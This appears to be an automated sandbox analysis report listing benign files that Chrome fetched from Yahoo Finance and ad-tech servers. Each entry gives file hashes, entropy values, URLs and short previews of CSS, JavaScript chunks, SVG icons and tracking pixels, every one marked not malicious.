                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:B025AD62FD0F8686038A9DC73703CAC0964D492ED075B755770AA2935DEBA36EE051B9EBB357EA664AFE3EC08EF678E2C692360A53CE73EA1C62779A4EB432A0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://gum.criteo.com/syncframe?origin=publishertag&topUrl=finance.yahoo.com&gdpr=0&gdpr_consent=&us_privacy=1YNN&gpp=DBAA&gpp_sid=-1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>.<html>.<head>. <script type="text/javascript">. window.CONFIG_CSM_DOMAIN_NAME = "csm.nl3.eu.criteo.net";. window.CONFIG_CSM_RATIO = 100;. window.GUM_DOMAIN = "gum.criteo.com";. </script>. <script type="text/javascript">. !function(){"use strict";var i=function(t,e){return(i=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(t,e){t.__proto__=e}||function(t,e){for(var n in e)e.hasOwnProperty(n)&&(t[n]=e[n])})(t,e)};function t(t,e){function n(){this.constructor=t}i(t,e),t.prototype=null===e?Object.create(e):(n.prototype=e.prototype,new n)}var e=function(){return(e=Object.assign||function(t){for(var e,n=1,i=arguments.length;n<i;n++)for(var o in e=arguments[n])Object.prototype.hasOwnProperty.call(e,o)&&(t[o]=e[o]);return t}).apply(this,arguments)};function n(r,s,a,l){return new(a=a||Promise)(function(t,e){function n(t){try{o(l.next(t))}catch(t){e(t)}}function i(t){try{o(l.throw(t))}catch(t){e(t)}}function o(e){e.done?t(e.valu
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):589
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.088614430389869
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12:tr2bYPjihgGOlKGueiZuKGTaDmAZ779NFv0KwrbDRy1kvSI:tCbYPGPGuXVGTP47XFv0vRSI
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:BE4B1F70F47D6751177589620FD301B0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:6AB745FB62D750A58A57C5EAA596E37D3B0B06C4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:5C2CE11E474604BDDF10320EEB48A4D3ED75A5999CE32DE90BE3B086DA434131
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:55D2390D6DBF52474DE0A74632D44A4830D4CEF87A270EBBF6958D7C0676D48B27B35682D99D9BBC8A7D89D36F2570F2DE3C568E542087ED338FA4138B906CF7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://s.yimg.com/cv/apiv2/weather-svg/SUNNY.svg
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:<svg width="48" height="48" xmlns="http://www.w3.org/2000/svg">. <defs>. <linearGradient x1="-36.396%" y1="32.854%" x2="33.396%" y2="133.313%" id="a">. <stop stop-color="#FFF5B2" offset=".013%"/>. <stop stop-color="#FFDE00" offset="39.944%"/>. <stop stop-color="#FFA700" offset="100%"/>. </linearGradient>. </defs>. <g fill="url(#a)" fill-rule="nonzero">. <path d="M24 48c13.255 0 24-10.745 24-24S37.255 0 24 0 0 10.745 0 24s10.745 24 24 24z" opacity=".3"/>. <path d="M24 42c9.941 0 18-8.059 18-18S33.941 6 24 6 6 14.059 6 24s8.059 18 18 18z"/>. </g>.</svg>.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.0314906788435274
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:CUkwltxlHh/:P/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:325472601571F31E1BF00674C368D335
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:2DAEAA8B5F19F0BC209D976C02BD6ACB51B00B0A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:B1442E85B03BDCAF66DC58C7ABB98745DD2687D86350BE9A298A1D9382AC849B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:717EA0FF7F3F624C268ECCB244E24EC1305AB21557ABB3D6F1A7E183FF68A2D28F13D1D2AF926C9EF6D1FB16DD8CBE34CD98CACF79091DDDC7874DCEE21ECFDC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://ssum-sec.casalemedia.com/usermatchredir?s=184023&gdpr_consent=&gdpr=&gpp=&gpp_sid=&google_gid=CAESEEShAslRojCLDGesveREUto&google_cver=1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):86
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.234496061572304
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:yionv//thPlE+tnM7WsrtxBllKxt8SFFFlpimp:6v/lhPfZM1U82FFlpimp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:6C6641B08F4BE6F479F1588AF08054B3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:8DA28B3146834C48FD843B108749191516D2A65D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:C2ECFF291918A3CAF0B7E470323E89F2A1F05B92E12A10649E598CACEBE62ACF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:BE544E3106F2B8E8083EF88B68806D6CEF2C4FBDD416C2E8EE17C88B42337A2972AF2C54CB8287A86ACCF6AC41CBCCA9A2E79F9E44417F5B144681D2B501E235
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.PNG........IHDR....................sBIT....|.d.....IDAT..c````........N.....IEND.B`.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):139
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.016593821810489
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:OLo14e3K9ylWoKJQI2EdcuYqYl9BF4TaR8J1Lo14e8cuYAl:NuXXOqKvX9Al
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:909C493F6B79F1887ED9AEC122521D08
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:FE7450681469A2AE2DD2849883285D28C5FEF2C4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:5DDF94942BACDFB2578DD0263CBE83F169FCBBDADF88C71561B87D07818F850B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:35079B7692CD6557C6F0ADCCE1178F1A8988CDAAFA5A3F08D4E88BAFEC8F243A02C26805BC53F0F9A2B8D599B9A8111565B6D21D686556BFAC2E69BD826ADD18
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://finance.yahoo.com/assets/_app/immutable/assets/82.F1CMla6e.css
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:section.yf-1wux014{display:flex;flex-direction:column;gap:var(--space-4)}@media (min-width: 768px){section.yf-1wux014{gap:var(--space-6)}}.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:Java source, ASCII text, with very long lines (3207)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):3208
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.390886814946991
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:96:1MFN+4WIWFEFwiBnAKQZyywiyPDyrM8j9CV50OSek7NFGyMlsH:y+4xCmbXywH6j9CVi5ekzGTI
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:48AAA9AEBD992E9D248A71B5961041E5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:AEAE682E66B7681DAC986E4A1700125FA8AF103C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:0890320BEDD0E59BC2440FA4F9873DC567A0755DD84FCF8B2E763948C075704D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:A2354AEFD184F243503B9EFD088358C90B2157F4FD07092C7F4E5F8184B7DF88928BBBC5084EB3128EF163969EB40AD33455598F29D0E3D64F37E0AE79FD9030
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://finance.yahoo.com/assets/_app/immutable/chunks/Link.Cll6KZpb.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:import{s as B,A as k,e as C,b as D,d as E,f as G,j as P,i as U,B as M,U as u,k as T,l as Z,G as v,Y as N,T as F,c as H,u as J,g as K,a as O,Z as Q}from"./scheduler.Dr9AAxFe.js";import{S as R,i as V,t as m,g as q,a as g,e as y,c as W,b as X,m as p,d as w}from"./index.DCSmZEjO.js";import{g as x}from"./spread.CgU5AtxT.js";import{I as $}from"./Icon.BSWt_jx8.js";import{g as A}from"./i13nUtil.C-uBpR7k.js";function I(n){let e;const a=n[12].default,l=H(a,n,n[11],null);return{c(){l&&l.c()},l(s){l&&l.l(s)},m(s,r){l&&l.m(s,r),e=!0},p(s,r){l&&l.p&&(!e||r&2048)&&J(l,a,s,s[11],e?O(a,s[11],r,null):K(s[11]),null)},i(s){e||(m(l,s),e=!0)},o(s){g(l,s),e=!1},d(s){l&&l.d(s)}}}function L(n){let e,a;return e=new $({props:{size:n[6]||n[5],icon:n[4],type:"inherit"}}),{c(){W(e.$$.fragment)},l(l){X(e.$$.fragment,l)},m(l,s){p(e,l,s),a=!0},p(l,s){const r={};s&96&&(r.size=l[6]||l[5]),s&16&&(r.icon=l[4]),e.$set(r)},i(l){a||(m(e.$$.fragment,l),a=!0)},o(l){g(e.$$.fragment,l),a=!1},d(l){w(e,l)}}}function ee(n){let e,a,
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:Java source, ASCII text, with very long lines (5122)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):5123
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.462162652968791
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:96:MDQDtIomhO6ktN+FW3SkdmbKHJxgArmEuos2bdSdVUqxcc+8FoBn3vsT:MDQeomhO6Nks2pxgAXs2ojUht8Fa3vsT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:4944494BEF765F0FBDDA7D58EEB11F1B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:13F7A993BE20048B48225BFD200A12127848A55F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:C661F816F0FBCD1EDC0FE4BDB1AE003CC224FED33932CAB0D9EB5D98C285213D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:3BC2FD109C22DD65207CCE4A667B885D5BE3E98B88BBBBB6666A95CA7799AB5A681FE690B1EA5B495F9CD609B4AA483A8102B356DAB3415C6B6105C5456DE554
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://finance.yahoo.com/assets/_app/immutable/chunks/NavBar.DMjInWD3.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:import{s as R,e as C,d as p,f as E,i as y,q as k,_ as D,U as b,k as w,l as T,$ as W,A as X,t as J,b as M,h as K,j as S,B as U,G as Z,a0 as $,m as x}from"./scheduler.Dr9AAxFe.js";import{S as ee,i as le,g as O,e as Q,t as I,a as A,c as ae,b as te,m as se,d as ie}from"./index.DCSmZEjO.js";import{e as V,u as ne,o as re}from"./each.BExQfwb4.js";import{g as oe}from"./spread.CgU5AtxT.js";import{t as fe}from"./commonUtil.CI22_Irn.js";import{I as ue}from"./Icon.BSWt_jx8.js";import{g as G}from"./i13nUtil.C-uBpR7k.js";function P(r,e,t){const l=r.slice();l[8]=e[t],l[21]=t;const s=l[8];return l[9]=s.slk,l[10]=s.label,l[11]=s.selected,l[12]=s.href,l[13]=s.icon,l[14]=s.iconType,l[15]=s.isBeta,l[16]=s.milestone,l[17]=s.onClick,l[18]=s.iconClass,l[19]=W(s,["slk","label","selected","href","icon","iconType","isBeta","milestone","onClick","iconClass"]),l}function Y(r){let e,t;return e=new ue({props:{icon:r[13],type:r[14]||"inherit",size:"medium",className:r[18]}}),{c(){ae(e.$$.fragment)},l(l){te(e.$$.frag
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:Java source, ASCII text, with very long lines (6122)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):6123
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.623368673011989
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:96:1Z43kxmJXYlfDqnGXos522H3uklSPypu4iuNmRNPyM2bQF+B6gL9pUbMrTiHHS:fmJEfsUoC5H3HlSyquNmRNKVLcYpU7y
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:C6EE3CA4AA758FCD191C5D0929AB1424
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:DB5057DCFE7B01FBEA2815DAB6029548CCD2B1FF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:08B767BF7E55874E83A2EBFAA12AC4452009DF384CC7747C5E678C6D49CF0E9C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:1AC7C2670149165647C6FA99A3516BF7E31BF06D995BFAA2C9BAFF9F18A63F9F863DA9F1BD6108202A30CD9743CAD5C9C4CEB9E08315221F3AF721D11A647A8D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:import{s as Z,e as B,t as $,b as N,d as D,f as L,h as j,j as T,i as E,q as R,k as H,l as P,m as Y,p as J,x}from"./scheduler.Dr9AAxFe.js";import{S as tt,i as et,c as O,b as G,m as z,t as I,a as M,d as V,g as nt,e as at}from"./index.DCSmZEjO.js";import{e as K}from"./each.BExQfwb4.js";import{t as k}from"./commonUtil.CI22_Irn.js";import{S as ot,O as st}from"./Select.N-a6-Z3E.js";import{A as it}from"./keyboard_arrow_right.Be_AUpuz.js";import{B as F}from"./Button.DpT5MMuf.js";const lt='<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M18.41 16.59 13.82 12l4.59-4.59L17 6l-6 6 6 6zM6 6h2v12H6z"/></svg>',rt='<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M5.59 7.41 10.18 12l-4.59 4.59L7 18l6-6-6-6zM16 6h2v12h-2z"/></svg>',ft='<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M15.41 16.59 10.83 12l4.58-4.59L14 6l-6 6 6 6z"/></svg>';function Q(s,o,e){const n=s.slice();return n[15]=o[e],n}function ct(s){let o=s[15]+"",e;return{c(){e=$(o)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.292508224289396
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:CUmExltxlSle:JAle
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:55FADE2068E7503EAE8D7DDF5EB6BD09
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:317496A096D6C86486A71D4521994BCD171A6BB3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:E586A84D8523747F42E510D78E141015B6424CF67D612854E892A7BCEDC8EC9E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:A9ADB9FEEA4BC14B9C34ED17CD30F8CB36DC686E9F69A292FE65BEBC195BE4714391FD98EC7B67BFD363FBBB6089C41A0B7CAB5130B50B461748E668CAC75621
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:GIF89a.............!.......,........@..D..;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.0314906788435274
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:CUkwltxlHh/:P/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:325472601571F31E1BF00674C368D335
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:2DAEAA8B5F19F0BC209D976C02BD6ACB51B00B0A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:B1442E85B03BDCAF66DC58C7ABB98745DD2687D86350BE9A298A1D9382AC849B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:717EA0FF7F3F624C268ECCB244E24EC1305AB21557ABB3D6F1A7E183FF68A2D28F13D1D2AF926C9EF6D1FB16DD8CBE34CD98CACF79091DDDC7874DCEE21ECFDC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://dsum-sec.casalemedia.com/rum?cm_dsp_id=88&external_user_id=ZwWElQAHy2g0HAA9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (8734)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):9606
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.4264474832775695
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:192:73Zav4r12fSGHuNSwkJZH52xeaaW0BZZkIujqyP1+J4p57YHmz:73Qv4ReypkxIe3BZZkt+J+7YHm
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:E85F5D5501F172EBD639B1DDAFDD3790
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:45E601040090E7260C1233E317185B2B74F51959
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:5E90D3524922D0375E0B044D57DD6E76659CB4F53529B0CA4C9C8382D678E663
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:438E811EF9931C2A8CA290B01DEC6A1665348F127DCF526EEA51B7838AEA882A43E84646F191C43E76C4BC844169E59FD95F516FE97DBFC04214B7889C598719
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://finance.yahoo.com/assets/_app/immutable/chunks/initializeDock.BZZN2pZq.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:const __vite__fileDeps=["./EventCalendarPreview.vQLkRrSq.js","./scheduler.Dr9AAxFe.js","./index.DCSmZEjO.js","./each.BExQfwb4.js","./commonUtil.CI22_Irn.js","./stores.DPDRpTFd.js","./43.CtYdpA_T.js","./control.CYgJF_JY.js","./Button.DpT5MMuf.js","./spread.CgU5AtxT.js","./Icon.BSWt_jx8.js","../assets/Icon.DgFg0-NP.css","./i13nUtil.C-uBpR7k.js","../assets/Button.D4GRMVdO.css","./calendar_today.CDOAEiKc.js","./chevron_left.CltsmSmq.js","./Link.Cll6KZpb.js","../assets/Link.CHR7GGSC.css","./Select.N-a6-Z3E.js","./check.21reEWCG.js","./a11y-dialog.esm.BnYZCIGX.js","./expand_more.DscV4c36.js","../assets/Select.G4QVlChI.css","./chevron_right.Cz_AJ_iF.js","./Tooltip.DgP4ayih.js","./floating-ui.dom.C5fi-pG6.js","../assets/Tooltip.IRw8ojlh.css","./datetimeUtils.BKCxat1F.js","../assets/EventCalendarPreview.CD7glI99.css"],__vite__mapDeps=i=>i.map(i=>__vite__fileDeps[i]);.import{_ as U}from"./preload-helper.D6kgxu3v.js";import{d as k,e as E,r as D,j as I}from"./commonUtil.CI22_Irn.js";import{f as w,
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (29313), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):29313
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.259367625708286
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:768:h34uC4wZzyI5T8oZHGrOKXVoL0olNLmvvaJYrRhX+Lyx:KuCJJKX+4CNCvvwyx
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:2A6757EE40DCAEF5337D8A10392AD365
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:2A7F00E6FA011E14233037C239295EE1A09CAE66
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:54488723C384FEE5FB9A583A3CCD59E6BB5506B8E556AB3BEFAC9C930A2380FF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:987D21BA66CFEB83C6066E20F1769CAFD09A1ACCFC1A658A156CFE6E8E86ACDA7499281A8A0AF61487E3690C5E13B892C9A44C9F2E6737DD126E857BADE37AB6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:var adUnitType,isCampaign,campaignId,externalStartEventId,adId,creativeUnitType,placementId,siteId,eventReportingURL,isMobile,clickTagURL,serverURL,dynamicData,DYReportingKey,DYselectedGroup,DYselectedRule,resolveDynDataURL,maxDynAPICall,maxDynAPICallCnt,dyn__serviceList,isDynamic,debugWidget,isInLayout=!1,url=window.location.href,objectName=getParameterValue(url,"objectName"),parentAccess=!1,isExternalWg=!1,isExtAsInline=!1,isStandardInline=!1,jvxWidgetNode=null;try{var assetID,jvxWidgetNode=document.getElementById("jvxWidget");(isInLayout=!(!jvxWidgetNode||!jvxWidgetNode.getAttribute("data-is-in-layout")))||(assetID=window.frameElement.id,parentAccess=!0)}catch(e){}function jvx_raiseEventOnWindow(e){var t;document.createEvent?(t=document.createEvent("HTMLEvents")).initEvent(e,!0,!0):(t=document.createEventObject()).eventType=e,t.eventName=e;e=document.getElementById("jvx_eventHandler");document.createEvent?e.dispatchEvent(t):e.fireEvent("on"+t.eventType,t)}if(isInLayout||(parentAcces
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (577)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):578
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.9546877543801395
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12:1RvpN59zNckc33JJqhJRE7yBX+DVLQlrqnuGZ9Xu2nIARHbpNnRx:1RxN5Na5QfOVVHZ9XLnxtNRx
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:89760B9EE162B0868EF655132093FB3E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:05436DF37097C240E38F8048D9FA03A1F21CF6DA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:A76EAEB8B3F1FE0D93759B65448E374E7289C5256BC197461C192AAAA02B8763
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:5A7B290C70EFC051B4301A8D4581EE22F8DAC310E2EB687AFB74F2F990A3C0C30113934826FF23564F8800D4CF650DA790083E11D54D7926B89E82DE7F52CC3C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://finance.yahoo.com/assets/_app/immutable/assets/EnhancedPill.Cw8es2Sk.css
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.container.yf-1bst5x6{text-align:left;padding:var(--space-7) var(--space-6);border-radius:var(--border-radius-l);display:flex;flex-direction:column;gap:var(--space-4);max-width:26.5rem;text-wrap:wrap;word-wrap:break-word;background-color:var(--surface1)}.buttons.yf-1bst5x6{display:flex;align-items:flex-start;gap:.625rem;margin-top:var(--space-4)}.title.yf-1bst5x6{font-weight:var(--font-bold);font-size:var(--font-3xl)}.subtext.yf-1bst5x6{font-weight:var(--font-normal);font-size:var(--font-m)}@media only screen and (max-width: 767px){.container.yf-1bst5x6{max-width:100vw}}.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):132
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.730841676486811
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:qqNHnQLiDuAJKyMhWqGYHYOfaK+Cw:qqRQLiDRKsvYH9aKLw
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:EBBF7585C063823A02D97415F292F30B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:D2BD5E4B0CD41F20E1CBE337601D12439F7C9911
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:F6FF295E198F9014F50E977E199014089616A8C48F16F0E73532D60B5524C1C3
